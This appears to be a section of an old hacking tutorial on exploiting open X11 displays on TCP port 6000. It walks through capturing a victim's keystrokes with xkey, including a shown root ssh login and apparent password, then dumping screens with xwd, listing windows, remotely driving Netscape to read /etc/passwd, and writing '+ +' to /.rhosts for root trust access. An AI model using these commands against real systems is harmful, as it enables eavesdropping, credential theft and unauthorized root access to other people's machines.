X11 (6000 TCP)

X11 (6000 TCP)
X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control for clients to connect to the server is facilitated with the "xhost" command. By default it is set up in a way that nobody can connect to the display - default deny. As soon as programs are sharing the display (exporting an xterm to your display from another host or whatever) the user of the display have to add the IP number or DNS name of the client that wish to connect by running the command "xhost +". In theory this works perfectly nice, but in the real world people tend to just enter "xhost +" which allows anyone to connect to the display.

A host that is open for anyone to connect to the display is risking a lot, and could possibly be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that is entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:

xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also be "copied" - the root window (the main window) can be copied, and displayed. Each window have a unique ID - you can specify which window you want to copy, but for a start let us get the root window:

xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
xv /tmp/screendump

We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command:
xwininfo -display -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10

0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see the other screen listed (you won't see it with xwd). With a bit of luck you get a Netscape browser open. To get Netscape open on an open X11 display is very good news as you can remotely control Netscape. Fancy telling Netscape to open /etc/passwd and doing another screen capture? Here is how :
netscape -display -remote 'openFile(/etc/passwd)'
xwd -display -root -silent -out /tmp/netscape_
xv /tmp/netscape

You can even tell Netscape to write files. It won't work trying to overwrite files - you will find a nasty Netscape popup, but you can write files that do not exist. You could create a page with "+ +" on it, redirect the browser to the page, and, if Netscape is running as root, save it to /.rhosts. Be sure to have a close look at http://home.netscape.com/newsref/std/x-remote.html if you find an open X11 running Netscape.

In theory you could also send keystrokes to an open X display. I found the program "xpusher.c" at , fiddled around with it, but it does not seem to work. There might be other programs around.